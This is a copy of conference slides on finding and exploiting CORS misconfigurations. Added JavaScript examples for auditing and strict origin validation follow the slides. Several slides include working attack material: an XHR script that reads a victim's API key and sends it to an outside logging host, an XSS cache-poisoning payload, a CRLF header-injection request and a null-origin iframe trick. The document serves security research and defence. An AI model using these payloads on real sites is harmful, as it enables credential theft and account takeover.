Exploiting Cors Misconfigurations: For Bitcoins and Bounties

The document discusses CORS misconfigurations and exploits. It covers fundamentals of CORS, consequences of exploits with and without credentials, and mitigations. It provides examples of CORS vulnerabilities like origin reflection, null origin, and cache poisoning that can lead to credential theft, XSS, and other attacks.

Uploaded by Yash Sancheti

EXPLOITING CORS MISCONFIGURATIONS
For Bitcoins and Bounties

James Kettle
A MORAL STORY

• WeBuy0day
– Internal team of security experts
– Users are all security experts
– Easily fenced intellectual property
– Trivial CSRF

2009 – CSRF
2016 – CORS
OVERVIEW

• Fundamentals & Limitations

• Consequences
– Exploits with credentials
– Exploitation without credentials

• Mitigations

• Q&A
CORE CONCEPT

Origin: https://mail.google.com

https://mail.google.com  |  Same Origin Policy  |  https://dropbox.com

Access-Control-Allow-Origin: https://mail.google.com
Access-Control-Allow-Credentials: true
ORIGIN LISTS

Spec:
"Access-Control-Allow-Origin" ":" origin-list-or-null

Reality:

"In practice the origin-list-or-null production is more constrained. Rather than allowing a space-separated list of origins, it is either a single origin or the string "null"." - https://www.w3.org/TR/cors/
WILDCARDS

* is the only wildcard origin
– https://*.example.com is not valid

"The string "*" cannot be used for a resource that supports credentials." - https://www.w3.org/TR/cors/

developers.mozilla.org:
SOLUTION

• Dynamic generation
– More likely to be vulnerable :(
– Less likely to be discovered* :(

• Bespoke, security-critical functionality parsing user-supplied URLs
– What could possibly go wrong?
EXPLOITATION WITH CREDENTIALS

Access-Control-Allow-Credentials: true
ORIGIN REFLECTION

Simple Origin Reflection

GET /api/requestApiKey HTTP/1.1
Host: btc-exchange.com
Origin: http://labs-albinowax
Cookie: sessionid=validSessionId

HTTP/1.1 200 OK
Access-Control-Allow-Origin: http://labs-albinowax
Access-Control-Allow-Credentials: true

{"id":"zv691C...
ORIGIN REFLECTION

var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','https://btc-exchange.com/api/requestApiKey',true);
req.withCredentials = true;
req.send();

function reqListener() {
location='//skeletonscribe.net/log?key='+this.responseText;
}

Use API key to:
– Disable notifications
– Enable 2FA
– Transfer BTC to your account
– Place trades

www.btc-bank.ru
STARTSWITH

GET /api HTTP/1.1
Host: btc.net

Origin: https://btc.net
ACAO: https://btc.net

Origin: https://evil.net
< no CORS headers >

Origin: https://btc.net.evil.net
ACAO: https://btc.net.evil.net
ENDSWITH

GET /zz/api HTTP/1.1
Host: advisor.com
Origin: https://notadvisor.com

HTTP/1.1 200 OK
Content-Security-Policy: frame-ancestors…
Strict-Transport-Security: max-age=3150000
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block;
ACAO: https://notadvisor.com
ACAC: true
null origin

origin-list-or-null
What is null?
An origin Google trusts

GET /reader?url=zxcvbn.pdf
Host: docs.google.com
Origin: null

HTTP/1.1 200 OK
ACAO: null
ACAC: true
null origin

An origin a bitcoin wallet trusts!

GET /wallet
Host: btc-wallet.net
Origin: null

HTTP/1.1 200 OK
ACAO: null
ACAC: true

Found a bunch more using Rapid7's sonar.http
null origin

Who has the null origin?

<iframe sandbox='allow-scripts allow-forms'
src='
data:text/html, <!DOCTYPE html>
<script>
var req = new XMLHttpRequest();
</script>
'></iframe>

Impact:
– Google user account detail theft
– Encrypted wallet theft
null origin

origin-list-or-null
What is null?
*, but less obvious
*, but more dangerous
exHTTPS

Sequence diagram (Client, Attacker, Internet; time flows downwards):

1. Client -> Internet: https://google.com/finance
   Internet -> Client: sensitive share info
2. Client -> Attacker: http://cnn.com
   Attacker -> Client: 307 -> http://evil.google.com
3. Client -> Attacker: http://evil.google.com
   Attacker -> Client: CORS payload
4. Client -> Internet (https://google.com/finance):

GET /finance HTTP/1.1
Host: google.com
Origin: http://evil.google.com

HTTP/1.1 200 OK
ACAO: http://evil.google.com
ACAC: true

sensitive share info
SUBDOMAINS

*.yoursite.com is not trustworthy
– XSS
– Intentional XSS (see: Bugzilla)
– Subdomain hijacking
– ISP content injection (HTTP only)
EXPLOITATION WITHOUT CREDENTIALS

Access-Control-Allow-Credentials: false
TUNNELING

Diagram: https://attacker.net (INTERNET) -> LAN

Jetbrains quite generously awarded a bounty of $50,000, even though Jetbrains doesn't have a bug bounty program.
http://blog.saynotolinux.com/blog/2016/08/15/jetbrains-ide-remote-code-execution-and-local-file-disclosure-vulnerability-analysis/
CACHE POISONING

• Vary: Origin
"I must say, it doesn't make me very confident that soon more sites will be supporting CORS if not even the W3C manages to configure its server right" - Reto Gmür

• What if I don't?
– Mostly just breaks stuff
– Sometimes it's more interesting…

https://lists.w3.org/Archives/Public/public-webappsec/2016Jun/0057.html
CACHE POISONING: CLIENT-SIDE

Make 'unexploitable' XSS workable

GET /login HTTP/1.1
Host: example.com
Origin: https://evil.com
X-User: <svg/onload=alert(1)>

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-User
Content-Type: text/html

Invalid user: <svg/onload=alert(1)>

var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','http://example.com/login',true);
req.setRequestHeader('X-User', '<svg/onload=alert(1)>');
req.send();
function reqListener() {
location='http://example.com/login';
}
CACHE POISONING: SERVER-SIDE

Escalate no-credentials CORS access to stored XSS

GET / HTTP/1.1
Origin: z[0d]Content-Type: text/html; charset=UTF-7

Internet Explorer Vision™:

HTTP/1.1 200 OK
Access-Control-Allow-Origin: z
Content-Type: text/html; charset=UTF-7

*works in Edge too!
HTTP HEADER INJECTION

GET /?lc=en%0dACAO: null%0dACAC: true
Origin: null

Internet Explorer Vision™:

HTTP/1.1 200 OK
Set-Cookie: locale=en
ACAO: null
ACAC: true
MITIGATIONS & LESSONS LEARNED

Access-Control-Allow-Nothing
PENTESTER LESSONS

DETECT
– Seek out APIs
– Try example.net, null, anything else
– Use a request rewrite rule

MAP
– Does it only validate the start/end?
– Does it restrict the protocol?
– Does it require a valid domain?
– Are credentials supported?

EXPLOIT
– Are there potential exploit chains?
– Is Vary: Origin specified?
– Is cache poisoning practical?
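As an added example (not from the slides), here is an offline self-audit helper for an API you operate that works through the DETECT and MAP questions above: it derives the probe origins the slides use (exact origin, start-only match, end-only match, protocol downgrade, null, an arbitrary origin) and classifies each recorded response by whether the probe was allowed, whether credentials were enabled and whether Vary: Origin was present. The audited origin https://api.example and the recorded responses are constructed for the demonstration.

```javascript
// Added example (not from the slides). Self-audit of CORS responses recorded
// from an API you operate. TARGET and SAMPLE_RESPONSES are hypothetical.
const TARGET = 'https://api.example';

// Probe origins covering the MAP questions on the slide.
function probeOrigins(target) {
  const host = new URL(target).hostname;
  return {
    control:    target,                               // should be allowed
    startsWith: `https://${host}.attacker.example`,   // passes a startsWith check
    endsWith:   `https://not${host}`,                 // passes an endsWith check
    protocol:   `http://${host}`,                     // passes if protocol is not restricted
    nullOrigin: 'null',                               // sandboxed iframes / data: URLs
    arbitrary:  'https://example.net',                // full reflection
  };
}

// Classify one recorded response to one probe origin.
function classify(probeOrigin, headers) {
  const h = Object.fromEntries(Object.entries(headers).map(([k, v]) => [k.toLowerCase(), v]));
  const acao = h['access-control-allow-origin'];
  const creds = h['access-control-allow-credentials'] === 'true';
  const vary = (h['vary'] || '').toLowerCase().split(',').map(s => s.trim()).includes('origin');
  if (acao === undefined) return { trusted: false, creds, vary, note: 'no CORS headers' };
  if (acao === '*') {
    return { trusted: true, creds, vary,
             note: creds ? 'wildcard with credentials (browsers refuse this combination)' : 'wildcard, no credentials' };
  }
  return { trusted: acao === probeOrigin, creds, vary,
           note: acao === probeOrigin ? 'origin echoed' : 'other origin allowed' };
}

// Run every probe against the recorded responses; report probes other than the
// control that were allowed, flagging credentials and a missing Vary: Origin.
function audit(target, responses) {
  const findings = [];
  for (const [name, origin] of Object.entries(probeOrigins(target))) {
    const r = classify(origin, responses[name] || {});
    if (name !== 'control' && r.trusted) {
      findings.push(`${name}: ${origin} is allowed` +
                    (r.creds ? ' with credentials' : '') +
                    (r.vary ? '' : ' (no Vary: Origin)'));
    }
  }
  return findings;
}

// Constructed responses from a server with an endsWith bug that also trusts null.
const SAMPLE_RESPONSES = {
  control:    { 'Access-Control-Allow-Origin': 'https://api.example', 'Access-Control-Allow-Credentials': 'true' },
  startsWith: {},
  endsWith:   { 'Access-Control-Allow-Origin': 'https://notapi.example', 'Access-Control-Allow-Credentials': 'true' },
  protocol:   {},
  nullOrigin: { 'Access-Control-Allow-Origin': 'null', 'Access-Control-Allow-Credentials': 'true', 'Vary': 'Origin' },
  arbitrary:  {},
};

console.log(audit(TARGET, SAMPLE_RESPONSES));
```

Feed it the headers your own API returned for each probe; anything listed under "with credentials" maps directly onto the EXPLOITATION WITH CREDENTIALS slides, and a missing Vary: Origin is the cache-poisoning question from the EXPLOIT column.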
SPEC LESSONS

• Wildcard+credentials exception
– :) Saved developers.mozilla.org

• Lack of partial wildcards
– :( Hurts subdomain trust

• Suggestions
– Allow partial wildcards
– Apply wildcard exception to 'null'
BROWSER LESSONS

• Multiple origins
– :) Prevents trusted origin injection:
Origin: https://evil.com safe.example.com
– :( Forces dynamic generation

• Suggestions:
– Allow multiple origins
– Block reverse mixed content
DEVELOPER LESSONS

• Don't go dynamic

• Validate with caution
– Is a valid domain name
– Ends with .yourdomain.tld
– Starts with https://

• Specify Vary: Origin

• Don't trust null!
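The following is an added example, not code from the slides, for the case where an API does have to generate the header dynamically. It places the three validators that the STARTSWITH, ENDSWITH and null-origin slides broke next to one written to the checklist above (valid domain name, ends with .yourdomain.tld, starts with https://, never null), and builds the response headers with Vary: Origin included. The domain yourdomain.tld is the slide's placeholder and the attacker hostnames are constructed.

```javascript
// Added example (not from the slides). Server-side Origin validation for a
// hypothetical API on yourdomain.tld.
const TRUSTED_DOMAIN = 'yourdomain.tld';   // assumption: the apex domain we control

// Flawed (STARTSWITH slide): https://yourdomain.tld.evil.net passes.
function naiveStartsWith(origin) {
  return origin.startsWith('https://' + TRUSTED_DOMAIN);
}

// Flawed (ENDSWITH slide): https://notyourdomain.tld passes.
function naiveEndsWith(origin) {
  return origin.endsWith(TRUSTED_DOMAIN);
}

// Flawed (null origin slides): sandboxed iframes and data: URLs send "null".
function naiveAllowNull(origin) {
  return origin === 'null' || origin === 'https://' + TRUSTED_DOMAIN;
}

// Syntactic hostname check: dot-separated labels, letters/digits/hyphens,
// alphabetic TLD, 253 characters at most.
const HOSTNAME_RE = /^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}$/i;

// Validation per the DEVELOPER LESSONS checklist. An Origin header carries only
// scheme://host[:port], so anything with a path, query, fragment or userinfo is
// rejected as malformed rather than parsed leniently.
function isTrustedOrigin(origin) {
  if (typeof origin !== 'string' || origin === 'null') return false;   // never trust null
  let url;
  try { url = new URL(origin); } catch { return false; }               // must parse as a URL
  if (url.protocol !== 'https:') return false;                         // starts with https://
  if (url.username || url.password || url.pathname !== '/' || url.search || url.hash) return false;
  const host = url.hostname;
  if (!HOSTNAME_RE.test(host)) return false;                           // is a valid domain name
  return host === TRUSTED_DOMAIN || host.endsWith('.' + TRUSTED_DOMAIN); // ends with .yourdomain.tld
}

// Response headers: echo the origin only when trusted, and always send
// Vary: Origin so a shared cache never replays one origin's answer to another.
function corsHeaders(origin) {
  const headers = { 'Vary': 'Origin' };
  if (isTrustedOrigin(origin)) {
    headers['Access-Control-Allow-Origin'] = origin;
    headers['Access-Control-Allow-Credentials'] = 'true';
  }
  return headers;
}

// Constructed probe origins mirroring the slides.
const PROBES = [
  'https://yourdomain.tld', 'https://app.yourdomain.tld', 'https://yourdomain.tld.evil.net',
  'https://notyourdomain.tld', 'http://app.yourdomain.tld', 'null',
];
for (const o of PROBES) {
  console.log(o, { startsWith: naiveStartsWith(o), endsWith: naiveEndsWith(o),
                   allowNull: naiveAllowNull(o), strict: isTrustedOrigin(o) });
}
```

Note that "ends with .yourdomain.tld" still extends trust to every subdomain, which the SUBDOMAINS slide warns is only as strong as the weakest host under that domain; an exact allowlist of the origins that actually need access is the safer variant of the same function.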
FURTHER READING

Slides:
https://portswigger.net/knowledgebase/papers/ExploitingCORSMisconfigurations.pdf

Writeup:
http://blog.portswigger.net/2016/10/exploiting-cors-misconfigurations-for.html

• "Misconfigured CORS and why web application security is not getting easier." – today, 1415
TAKE-AWAYS

• CORS misconfigurations are
– Often critical
– Sometimes subtle
– Out there if you look for them

@albinowax
[email protected]
